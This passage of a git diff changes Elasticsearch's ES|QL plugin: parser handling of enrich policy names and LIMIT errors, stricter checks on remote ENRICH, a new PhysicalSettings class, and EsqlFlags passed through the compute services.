a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlBaseParserVisitor.java @@ -332,6 +332,12 @@ public interface EsqlBaseParserVisitor extends ParseTreeVisitor { * @return the visitor result */ T visitEnrichCommand(EsqlBaseParser.EnrichCommandContext ctx); + /** + * Visit a parse tree produced by {@link EsqlBaseParser#enrichPolicyName}. + * @param ctx the parse tree + * @return the visitor result + */ + T visitEnrichPolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx); /** * Visit a parse tree produced by {@link EsqlBaseParser#enrichWithClause}. 
* @param ctx the parse tree diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java index a8ee18d8b2777..326aa183e1891 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/EsqlParser.java @@ -21,6 +21,7 @@ import org.elasticsearch.xpack.esql.core.util.StringUtils; import org.elasticsearch.xpack.esql.expression.function.EsqlFunctionRegistry; import org.elasticsearch.xpack.esql.plan.logical.LogicalPlan; +import org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.telemetry.PlanTelemetry; import java.util.BitSet; @@ -98,20 +99,20 @@ public void setEsqlConfig(EsqlConfig config) { } // testing utility - public LogicalPlan createStatement(String query) { - return createStatement(query, new QueryParams()); + public LogicalPlan createStatement(String query, Configuration configuration) { + return createStatement(query, new QueryParams(), configuration); } // testing utility - public LogicalPlan createStatement(String query, QueryParams params) { - return createStatement(query, params, new PlanTelemetry(new EsqlFunctionRegistry())); + public LogicalPlan createStatement(String query, QueryParams params, Configuration configuration) { + return createStatement(query, params, new PlanTelemetry(new EsqlFunctionRegistry()), configuration); } - public LogicalPlan createStatement(String query, QueryParams params, PlanTelemetry metrics) { + public LogicalPlan createStatement(String query, QueryParams params, PlanTelemetry metrics, Configuration configuration) { if (log.isDebugEnabled()) { log.debug("Parsing as statement: {}", query); } - return invokeParser(query, params, metrics, EsqlBaseParser::singleStatement, AstBuilder::plan); + return invokeParser(query, params, metrics, EsqlBaseParser::singleStatement, AstBuilder::plan, configuration); } private T invokeParser( @@ -119,7 +120,8 @@ private T invokeParser( QueryParams params, PlanTelemetry metrics, Function parseFunction, - BiFunction result + BiFunction result, + Configuration configuration ) { if (query.length() > MAX_LENGTH) { throw new ParsingException("ESQL statement is too large [{} characters > {}]", query.length(), MAX_LENGTH); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java index a8ea1ba95dc15..7b4f971aa5f13 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/parser/LogicalPlanBuilder.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.esql.parser; import org.antlr.v4.runtime.ParserRuleContext; -import org.antlr.v4.runtime.Token; import org.antlr.v4.runtime.tree.ParseTree; import org.apache.lucene.util.BytesRef; import org.elasticsearch.Build; @@ -90,7 +89,6 @@ import java.util.function.Function; import static java.util.Collections.emptyList; -import static org.elasticsearch.xpack.esql.common.Failure.fail; import static org.elasticsearch.xpack.esql.core.type.DataType.KEYWORD; import static org.elasticsearch.xpack.esql.core.util.StringUtils.WILDCARD; import static org.elasticsearch.xpack.esql.expression.NamedExpressions.mergeOutputExpressions; @@ -393,21 +391,22 @@ public PlanFactory 
visitWhereCommand(EsqlBaseParser.WhereCommandContext ctx) { public PlanFactory visitLimitCommand(EsqlBaseParser.LimitCommandContext ctx) { Source source = source(ctx); Object val = expression(ctx.constant()).fold(FoldContext.small() /* TODO remove me */); - if (val instanceof Integer i) { - if (i < 0) { - throw new ParsingException(source, "Invalid value for LIMIT [" + i + "], expecting a non negative integer"); - } + if (val instanceof Integer i && i >= 0) { return input -> new Limit(source, new Literal(source, i, DataType.INTEGER), input); - } else { - throw new ParsingException( - source, - "Invalid value for LIMIT [" - + BytesRefs.toString(val) - + ": " - + (expression(ctx.constant()).dataType() == KEYWORD ? "String" : val.getClass().getSimpleName()) - + "], expecting a non negative integer" - ); } + + String valueType = expression(ctx.constant()).dataType().typeName(); + + throw new ParsingException( + source, + "value of [" + + source.text() + + "] must be a non negative integer, found value [" + + ctx.constant().getText() + + "] type [" + + valueType + + "]" + ); } @Override @@ -514,8 +513,15 @@ public PlanFactory visitChangePointCommand(EsqlBaseParser.ChangePointCommandCont return child -> new ChangePoint(src, child, value, key, targetType, targetPvalue); } - private static Tuple parsePolicyName(Token policyToken) { - String stringValue = policyToken.getText(); + private static Tuple parsePolicyName(EsqlBaseParser.EnrichPolicyNameContext ctx) { + String stringValue; + if (ctx.ENRICH_POLICY_NAME() != null) { + stringValue = ctx.ENRICH_POLICY_NAME().getText(); + } else { + stringValue = ctx.QUOTED_STRING().getText(); + stringValue = stringValue.substring(1, stringValue.length() - 1); + } + int index = stringValue.indexOf(":"); Mode mode = null; if (index >= 0) { @@ -527,7 +533,7 @@ private static Tuple parsePolicyName(Token policyToken) { if (mode == null) { throw new ParsingException( - source(policyToken), + source(ctx), "Unrecognized value [{}], ENRICH policy qualifier needs to be one of {}", modeValue, Arrays.stream(Mode.values()).map(s -> "_" + s).toList() diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java index 11e9a57064e5b..413fe4d6d36ab 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plan/logical/Enrich.java @@ -35,9 +35,11 @@ import org.elasticsearch.xpack.esql.index.EsIndex; import org.elasticsearch.xpack.esql.io.stream.PlanStreamInput; import org.elasticsearch.xpack.esql.plan.GeneratingPlan; +import org.elasticsearch.xpack.esql.plan.logical.join.LookupJoin; import java.io.IOException; import java.util.ArrayList; +import java.util.HashSet; import java.util.List; import java.util.Locale; import java.util.Map; @@ -295,23 +297,33 @@ public BiConsumer postAnalysisPlanVerification() { * retaining the originating cluster and restructing pages for routing, which might be complicated. */ private static void checkRemoteEnrich(LogicalPlan plan, Failures failures) { - boolean[] agg = { false }; - boolean[] enrichCoord = { false }; + // First look for remote ENRICH, and then look at its children. Going over the whole plan once is trickier as remote ENRICHs can be + // in separate FORK branches which are valid by themselves. 
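+ // Each remote ENRICH is therefore verified on its own: checkForPlansForbiddenBeforeRemoteEnrich walks only that
+ // ENRICH's subtree and collects the forbidden upstream commands into a set, so each offender is reported exactly once.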
+ plan.forEachUp(Enrich.class, enrich -> checkForPlansForbiddenBeforeRemoteEnrich(enrich, failures)); + } + + /** + * For a given remote {@link Enrich}, check if there are any forbidden plans upstream. + */ + private static void checkForPlansForbiddenBeforeRemoteEnrich(Enrich enrich, Failures failures) { + if (enrich.mode != Mode.REMOTE) { + return; + } + + Set badCommands = new HashSet<>(); - plan.forEachUp(UnaryPlan.class, u -> { + enrich.forEachUp(LogicalPlan.class, u -> { if (u instanceof Aggregate) { - agg[0] = true; - } else if (u instanceof Enrich enrich && enrich.mode() == Enrich.Mode.COORDINATOR) { - enrichCoord[0] = true; - } - if (u instanceof Enrich enrich && enrich.mode() == Enrich.Mode.REMOTE) { - if (agg[0]) { - failures.add(fail(enrich, "ENRICH with remote policy can't be executed after STATS")); - } - if (enrichCoord[0]) { - failures.add(fail(enrich, "ENRICH with remote policy can't be executed after another ENRICH with coordinator policy")); - } + badCommands.add("STATS"); + } else if (u instanceof Enrich upstreamEnrich && upstreamEnrich.mode() == Enrich.Mode.COORDINATOR) { + badCommands.add("another ENRICH with coordinator policy"); + } else if (u instanceof LookupJoin) { + badCommands.add("LOOKUP JOIN"); + } else if (u instanceof Fork) { + badCommands.add("FORK"); } }); + + badCommands.forEach(c -> failures.add(fail(enrich, "ENRICH with remote policy can't be executed after " + c))); } } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java index acf685f3dcd9c..ac63c644281dd 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/EsPhysicalOperationProviders.java @@ -22,15 +22,14 @@ import org.elasticsearch.compute.aggregation.GroupingAggregator; import org.elasticsearch.compute.aggregation.blockhash.BlockHash; import org.elasticsearch.compute.data.ElementType; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.lucene.LuceneCountOperator; import org.elasticsearch.compute.lucene.LuceneOperator; import org.elasticsearch.compute.lucene.LuceneSliceQueue; import org.elasticsearch.compute.lucene.LuceneSourceOperator; import org.elasticsearch.compute.lucene.LuceneTopNSourceOperator; -import org.elasticsearch.compute.lucene.TimeSeriesExtractFieldOperator; import org.elasticsearch.compute.lucene.TimeSeriesSourceOperatorFactory; -import org.elasticsearch.compute.lucene.ValuesSourceReaderOperator; +import org.elasticsearch.compute.lucene.read.TimeSeriesExtractFieldOperator; +import org.elasticsearch.compute.lucene.read.ValuesSourceReaderOperator; import org.elasticsearch.compute.operator.Operator; import org.elasticsearch.compute.operator.OrdinalsGroupingOperator; import org.elasticsearch.compute.operator.SourceOperator; @@ -143,17 +142,17 @@ public boolean hasReferences() { } private final List shardContexts; - private final DataPartitioning defaultDataPartitioning; + private final PhysicalSettings physicalSettings; public EsPhysicalOperationProviders( FoldContext foldContext, List shardContexts, AnalysisRegistry analysisRegistry, - DataPartitioning defaultDataPartitioning + PhysicalSettings physicalSettings ) { super(foldContext, analysisRegistry); this.shardContexts = shardContexts; - this.defaultDataPartitioning = 
defaultDataPartitioning; + this.physicalSettings = physicalSettings; } @Override @@ -178,7 +177,10 @@ public final PhysicalOperation fieldExtractPhysicalOperation(FieldExtractExec fi // TODO: consolidate with ValuesSourceReaderOperator return source.with(new TimeSeriesExtractFieldOperator.Factory(fields, shardContexts), layout.build()); } else { - return source.with(new ValuesSourceReaderOperator.Factory(fields, readers, docChannel), layout.build()); + return source.with( + new ValuesSourceReaderOperator.Factory(physicalSettings.valuesLoadingJumboSize(), fields, readers, docChannel), + layout.build() + ); } } @@ -281,7 +283,7 @@ public final PhysicalOperation sourcePhysicalOperation(EsQueryExec esQueryExec, luceneFactory = new LuceneTopNSourceOperator.Factory( shardContexts, querySupplier(esQueryExec.query()), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), context.pageSize(rowEstimatedSize), limit, @@ -292,7 +294,7 @@ public final PhysicalOperation sourcePhysicalOperation(EsQueryExec esQueryExec, luceneFactory = new LuceneSourceOperator.Factory( shardContexts, querySupplier(esQueryExec.query()), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), context.pageSize(rowEstimatedSize), limit, @@ -344,7 +346,7 @@ public LuceneCountOperator.Factory countSource(LocalExecutionPlannerContext cont return new LuceneCountOperator.Factory( shardContexts, querySupplier(queryBuilder), - context.queryPragmas().dataPartitioning(defaultDataPartitioning), + context.queryPragmas().dataPartitioning(physicalSettings.defaultDataPartitioning()), context.queryPragmas().taskConcurrency(), limit == null ? NO_LIMIT : (Integer) limit.fold(context.foldCtx()) ); @@ -566,8 +568,8 @@ public ColumnAtATimeReader columnAtATimeReader(LeafReaderContext context) throws } return new ColumnAtATimeReader() { @Override - public Block read(BlockFactory factory, Docs docs) throws IOException { - Block block = reader.read(factory, docs); + public Block read(BlockFactory factory, Docs docs, int offset) throws IOException { + Block block = reader.read(factory, docs, offset); return typeConverter.convert((org.elasticsearch.compute.data.Block) block); } diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java new file mode 100644 index 0000000000000..4276eeaf39f9b --- /dev/null +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PhysicalSettings.java @@ -0,0 +1,64 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.xpack.esql.planner; + +import org.elasticsearch.cluster.service.ClusterService; +import org.elasticsearch.common.settings.Setting; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.common.unit.MemorySizeValue; +import org.elasticsearch.compute.lucene.DataPartitioning; +import org.elasticsearch.monitor.jvm.JvmInfo; + +/** + * Values for cluster level settings used in physical planning. 
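 * <p>A sketch of how the {@code esql.values_loading_jumbo_size} default below is
 * computed, assuming a hypothetical 32gb heap (the numbers are illustrative only):
 * <pre>{@code
 * long heapBytes    = 32L * 1024 * 1024 * 1024;         // JvmInfo.jvmInfo().getMem().getHeapMax()
 * long proportional = heapBytes / 1024;                 // 32mb, one 1024th of the heap
 * long floor        = ByteSizeValue.ofMb(1).getBytes(); // lower bound of 1mb
 * long jumboDefault = Math.max(proportional, floor);    // 32mb on this heap
 * }</pre>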
+ */ +public class PhysicalSettings { + public static final Setting DEFAULT_DATA_PARTITIONING = Setting.enumSetting( + DataPartitioning.class, + "esql.default_data_partitioning", + DataPartitioning.AUTO, + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + public static final Setting VALUES_LOADING_JUMBO_SIZE = new Setting<>("esql.values_loading_jumbo_size", settings -> { + long proportional = JvmInfo.jvmInfo().getMem().getHeapMax().getBytes() / 1024; + return ByteSizeValue.ofBytes(Math.max(proportional, ByteSizeValue.ofMb(1).getBytes())).getStringRep(); + }, + s -> MemorySizeValue.parseBytesSizeValueOrHeapRatio(s, "esql.values_loading_jumbo_size"), + Setting.Property.NodeScope, + Setting.Property.Dynamic + ); + + private volatile DataPartitioning defaultDataPartitioning; + private volatile ByteSizeValue valuesLoadingJumboSize; + + /** + * Ctor for prod that listens for updates from the {@link ClusterService}. + */ + public PhysicalSettings(ClusterService clusterService) { + clusterService.getClusterSettings().initializeAndWatch(DEFAULT_DATA_PARTITIONING, v -> this.defaultDataPartitioning = v); + clusterService.getClusterSettings().initializeAndWatch(VALUES_LOADING_JUMBO_SIZE, v -> this.valuesLoadingJumboSize = v); + } + + /** + * Ctor for testing. + */ + public PhysicalSettings(DataPartitioning defaultDataPartitioning, ByteSizeValue valuesLoadingJumboSize) { + this.defaultDataPartitioning = defaultDataPartitioning; + this.valuesLoadingJumboSize = valuesLoadingJumboSize; + } + + public DataPartitioning defaultDataPartitioning() { + return defaultDataPartitioning; + } + + public ByteSizeValue valuesLoadingJumboSize() { + return valuesLoadingJumboSize; + } +} diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java index 07771a6360625..48cfa24bec069 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/PlannerUtils.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.planner; +import org.elasticsearch.TransportVersion; import org.elasticsearch.common.Strings; import org.elasticsearch.common.breaker.NoopCircuitBreaker; import org.elasticsearch.common.util.BigArrays; @@ -25,11 +26,13 @@ import org.elasticsearch.xpack.esql.core.expression.Expression; import org.elasticsearch.xpack.esql.core.expression.FoldContext; import org.elasticsearch.xpack.esql.core.expression.MetadataAttribute; +import org.elasticsearch.xpack.esql.core.querydsl.query.Query; import org.elasticsearch.xpack.esql.core.tree.Source; import org.elasticsearch.xpack.esql.core.type.DataType; import org.elasticsearch.xpack.esql.core.util.Holder; import org.elasticsearch.xpack.esql.core.util.Queries; import org.elasticsearch.xpack.esql.expression.predicate.Predicates; +import org.elasticsearch.xpack.esql.io.stream.PlanStreamWrapperQueryBuilder; import org.elasticsearch.xpack.esql.optimizer.LocalLogicalOptimizerContext; import org.elasticsearch.xpack.esql.optimizer.LocalLogicalPlanOptimizer; import org.elasticsearch.xpack.esql.optimizer.LocalPhysicalOptimizerContext; @@ -49,6 +52,7 @@ import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.mapper.LocalMapper; import org.elasticsearch.xpack.esql.planner.mapper.Mapper; +import org.elasticsearch.xpack.esql.plugin.EsqlFlags; import 
org.elasticsearch.xpack.esql.session.Configuration; import org.elasticsearch.xpack.esql.stats.SearchContextStats; import org.elasticsearch.xpack.esql.stats.SearchStats; @@ -116,6 +120,8 @@ public static PhysicalPlan reductionPlan(PhysicalPlan plan) { } final FragmentExec fragment = (FragmentExec) fragments.getFirst(); + // Though FORK is technically a pipeline breaker, it should never show up here. + // See also: https://github.com/elastic/elasticsearch/pull/131945/files#r2235572935 final var pipelineBreakers = fragment.fragment().collectFirstChildren(Mapper::isPipelineBreaker); if (pipelineBreakers.isEmpty()) { return null; @@ -162,17 +168,26 @@ private static void forEachRelation(PhysicalPlan plan, Consumer acti } public static PhysicalPlan localPlan( + EsqlFlags flags, List searchContexts, Configuration configuration, FoldContext foldCtx, PhysicalPlan plan ) { - return localPlan(configuration, foldCtx, plan, SearchContextStats.from(searchContexts)); + return localPlan(flags, configuration, foldCtx, plan, SearchContextStats.from(searchContexts)); } - public static PhysicalPlan localPlan(Configuration configuration, FoldContext foldCtx, PhysicalPlan plan, SearchStats searchStats) { + public static PhysicalPlan localPlan( + EsqlFlags flags, + Configuration configuration, + FoldContext foldCtx, + PhysicalPlan plan, + SearchStats searchStats + ) { final var logicalOptimizer = new LocalLogicalPlanOptimizer(new LocalLogicalOptimizerContext(configuration, foldCtx, searchStats)); - var physicalOptimizer = new LocalPhysicalPlanOptimizer(new LocalPhysicalOptimizerContext(configuration, foldCtx, searchStats)); + var physicalOptimizer = new LocalPhysicalPlanOptimizer( + new LocalPhysicalOptimizerContext(flags, configuration, foldCtx, searchStats) + ); return localPlan(plan, logicalOptimizer, physicalOptimizer); } @@ -212,8 +227,13 @@ public static PhysicalPlan localPlan( /** * Extracts a filter that can be used to skip unmatched shards on the coordinator. */ - public static QueryBuilder canMatchFilter(PhysicalPlan plan) { - return detectFilter(plan, CoordinatorRewriteContext.SUPPORTED_FIELDS::contains); + public static QueryBuilder canMatchFilter( + EsqlFlags flags, + Configuration configuration, + TransportVersion minTransportVersion, + PhysicalPlan plan + ) { + return detectFilter(flags, configuration, minTransportVersion, plan, CoordinatorRewriteContext.SUPPORTED_FIELDS::contains); } /** @@ -221,11 +241,20 @@ public static QueryBuilder canMatchFilter(PhysicalPlan plan) { * We currently only use this filter for the @timestamp field, which is always a date field. Any tests that wish to use this should * take care to not use it with TEXT fields. 
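 * <p>For example (hypothetical query), in
 * <pre>{@code FROM logs-* | WHERE @timestamp > "2025-01-01" AND message == "error"}</pre>
 * only the {@code @timestamp} conjunct is a candidate for the coordinator
 * can-match filter: it is the only predicate over a field accepted by
 * {@code fieldName}, it references no other attributes, and it is fully
 * translatable to a query builder.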
*/ - static QueryBuilder detectFilter(PhysicalPlan plan, Predicate fieldName) { + static QueryBuilder detectFilter( + EsqlFlags flags, + Configuration configuration, + TransportVersion minTransportVersion, + PhysicalPlan plan, + Predicate fieldName + ) { // first position is the REST filter, the second the query filter final List requestFilters = new ArrayList<>(); + final LucenePushdownPredicates ctx = LucenePushdownPredicates.forCanMatch(minTransportVersion, flags); plan.forEachDown(FragmentExec.class, fe -> { - requestFilters.add(fe.esFilter()); + if (fe.esFilter() != null && fe.esFilter().supportsVersion(minTransportVersion)) { + requestFilters.add(fe.esFilter()); + } // detect filter inside the query fe.fragment().forEachUp(Filter.class, f -> { // the only filter that can be pushed down is that on top of the relation @@ -243,15 +272,18 @@ static QueryBuilder detectFilter(PhysicalPlan plan, Predicate fieldName) // and the expression is pushable (functions can be fully translated) if (matchesField && refsBuilder.isEmpty() - && translatable(exp, LucenePushdownPredicates.DEFAULT).finish() == TranslationAware.FinishedTranslatable.YES) { + && translatable(exp, ctx).finish() == TranslationAware.FinishedTranslatable.YES) { matches.add(exp); } } } if (matches.isEmpty() == false) { - requestFilters.add( - TRANSLATOR_HANDLER.asQuery(LucenePushdownPredicates.DEFAULT, Predicates.combineAnd(matches)).toQueryBuilder() - ); + Query qlQuery = TRANSLATOR_HANDLER.asQuery(ctx, Predicates.combineAnd(matches)); + QueryBuilder builder = qlQuery.toQueryBuilder(); + if (qlQuery.containsPlan()) { + builder = new PlanStreamWrapperQueryBuilder(configuration, builder); + } + requestFilters.add(builder); } }); }); diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java index 4dea8a50b5c17..f18463b28a94e 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/TypeConverter.java @@ -46,6 +46,11 @@ public org.elasticsearch.compute.data.Block eval(Page page) { return page.getBlock(0); } + @Override + public long baseRamBytesUsed() { + throw new UnsupportedOperationException("not used"); + } + @Override public void close() {} }; diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java index 137a2118b0d54..afda53697d5a2 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/planner/mapper/Mapper.java @@ -88,7 +88,7 @@ private PhysicalPlan mapUnary(UnaryPlan unary) { PhysicalPlan mappedChild = map(unary.child()); // - // TODO - this is hard to follow and needs reworking + // TODO - this is hard to follow, causes bugs and needs reworking // https://github.com/elastic/elasticsearch/issues/115897 // if (unary instanceof Enrich enrich && enrich.mode() == Enrich.Mode.REMOTE) { diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java index cd4ff13700515..4e8a89d024b71 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java +++ 
b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ClusterComputeHandler.java @@ -166,7 +166,7 @@ private void updateExecutionInfo(EsqlExecutionInfo executionInfo, String cluster builder.setTook(executionInfo.tookSoFar()); } if (v.getStatus() == EsqlExecutionInfo.Cluster.Status.RUNNING) { - builder.setFailures(resp.failures); + builder.addFailures(resp.failures); if (executionInfo.isStopped() || resp.failedShards > 0 || resp.failures.isEmpty() == false) { builder.setStatus(EsqlExecutionInfo.Cluster.Status.PARTIAL); } else { @@ -250,6 +250,7 @@ void runComputeOnRemoteCluster( final String localSessionId = clusterAlias + ":" + globalSessionId; final PhysicalPlan coordinatorPlan = ComputeService.reductionPlan(plan, true); final AtomicReference finalResponse = new AtomicReference<>(); + final EsqlFlags flags = computeService.createFlags(); final long startTimeInNanos = System.nanoTime(); final Runnable cancelQueryOnFailure = computeService.cancelQueryOnFailure(parentTask); try (var computeListener = new ComputeListener(transportService.getThreadPool(), cancelQueryOnFailure, listener.map(profiles -> { @@ -269,6 +270,7 @@ void runComputeOnRemoteCluster( localSessionId, "remote_reduce", clusterAlias, + flags, List.of(), configuration, configuration.newFoldContext(), @@ -282,6 +284,7 @@ void runComputeOnRemoteCluster( localSessionId, clusterAlias, parentTask, + flags, configuration, plan, concreteIndices, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java index dd94c52263235..d771de83685eb 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeContext.java @@ -21,6 +21,7 @@ record ComputeContext( String sessionId, String description, String clusterAlias, + EsqlFlags flags, List searchContexts, Configuration configuration, FoldContext foldCtx, diff --git a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java index 4adc97d28fee0..d12799ab8b170 100644 --- a/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java +++ b/x-pack/plugin/esql/src/main/java/org/elasticsearch/xpack/esql/plugin/ComputeService.java @@ -7,6 +7,7 @@ package org.elasticsearch.xpack.esql.plugin; +import org.elasticsearch.ExceptionsHelper; import org.elasticsearch.action.ActionListener; import org.elasticsearch.action.OriginalIndices; import org.elasticsearch.action.search.SearchRequest; @@ -18,7 +19,6 @@ import org.elasticsearch.common.util.concurrent.RunOnce; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.lucene.DataPartitioning; import org.elasticsearch.compute.operator.DriverCompletionInfo; import org.elasticsearch.compute.operator.DriverTaskRunner; import org.elasticsearch.compute.operator.FailureCollector; @@ -59,6 +59,7 @@ import org.elasticsearch.xpack.esql.plan.physical.PhysicalPlan; import org.elasticsearch.xpack.esql.planner.EsPhysicalOperationProviders; import org.elasticsearch.xpack.esql.planner.LocalExecutionPlanner; +import org.elasticsearch.xpack.esql.planner.PhysicalSettings; import org.elasticsearch.xpack.esql.planner.PlannerUtils; import org.elasticsearch.xpack.esql.session.Configuration; 
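// Sketch of the setFailures(..) -> addFailures(..) switch applied throughout
// this patch: failures now reach the cluster builder from several stages
// (field-caps, data nodes, the final driver), so they must accumulate instead
// of replacing one another. Stand-in shape, not the real Cluster.Builder:
//
//     private final List<ShardSearchFailure> failures = new ArrayList<>();
//
//     Builder addFailures(List<ShardSearchFailure> more) {
//         failures.addAll(more);      // append: earlier failures survive
//         return this;
//     }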
import org.elasticsearch.xpack.esql.session.EsqlCCSUtils; @@ -137,8 +138,7 @@ public class ComputeService { private final DataNodeComputeHandler dataNodeComputeHandler; private final ClusterComputeHandler clusterComputeHandler; private final ExchangeService exchangeService; - - private volatile DataPartitioning defaultDataPartitioning; + private final PhysicalSettings physicalSettings; @SuppressWarnings("this-escape") public ComputeService( @@ -177,12 +177,13 @@ public ComputeService( esqlExecutor, dataNodeComputeHandler ); - clusterService.getClusterSettings().initializeAndWatch(EsqlPlugin.DEFAULT_DATA_PARTITIONING, v -> this.defaultDataPartitioning = v); + this.physicalSettings = new PhysicalSettings(clusterService); } public void execute( String sessionId, CancellableTask rootTask, + EsqlFlags flags, PhysicalPlan physicalPlan, Configuration configuration, FoldContext foldContext, @@ -195,7 +196,7 @@ public void execute( // we have no sub plans, so we can just execute the given plan if (subplans == null || subplans.isEmpty()) { - executePlan(sessionId, rootTask, physicalPlan, configuration, foldContext, execInfo, null, listener, null); + executePlan(sessionId, rootTask, flags, physicalPlan, configuration, foldContext, execInfo, null, listener, null); return; } @@ -222,6 +223,7 @@ public void execute( mainSessionId, "main.final", LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -254,6 +256,7 @@ public void execute( executePlan( childSessionId, rootTask, + flags, subplan, configuration, foldContext, @@ -278,6 +281,7 @@ public void execute( public void executePlan( String sessionId, CancellableTask rootTask, + EsqlFlags flags, PhysicalPlan physicalPlan, Configuration configuration, FoldContext foldContext, @@ -322,6 +326,7 @@ public void executePlan( newChildSession(sessionId), profileDescription(profileQualifier, "single"), LOCAL_CLUSTER, + flags, List.of(), configuration, foldContext, @@ -370,9 +375,10 @@ public void executePlan( var computeListener = new ComputeListener( transportService.getThreadPool(), cancelQueryOnFailure, - listener.map(completionInfo -> { + listener.delegateFailureAndWrap((l, completionInfo) -> { + failIfAllShardsFailed(execInfo, collectedPages); execInfo.markEndQuery(); // TODO: revisit this time recording model as part of INLINESTATS improvements - return new Result(outputAttributes, collectedPages, completionInfo, execInfo); + l.onResponse(new Result(outputAttributes, collectedPages, completionInfo, execInfo)); }) ) ) { @@ -390,9 +396,13 @@ public void executePlan( var builder = new EsqlExecutionInfo.Cluster.Builder(v).setTook(tookTime); if (v.getStatus() == EsqlExecutionInfo.Cluster.Status.RUNNING) { final Integer failedShards = execInfo.getCluster(LOCAL_CLUSTER).getFailedShards(); - var status = localClusterWasInterrupted.get() || (failedShards != null && failedShards > 0) - ? EsqlExecutionInfo.Cluster.Status.PARTIAL - : EsqlExecutionInfo.Cluster.Status.SUCCESSFUL; + // Set the local cluster status (including the final driver) to partial if the query was stopped + // or encountered resolution or execution failures. + var status = localClusterWasInterrupted.get() + || (failedShards != null && failedShards > 0) + || v.getFailures().isEmpty() == false + ? 
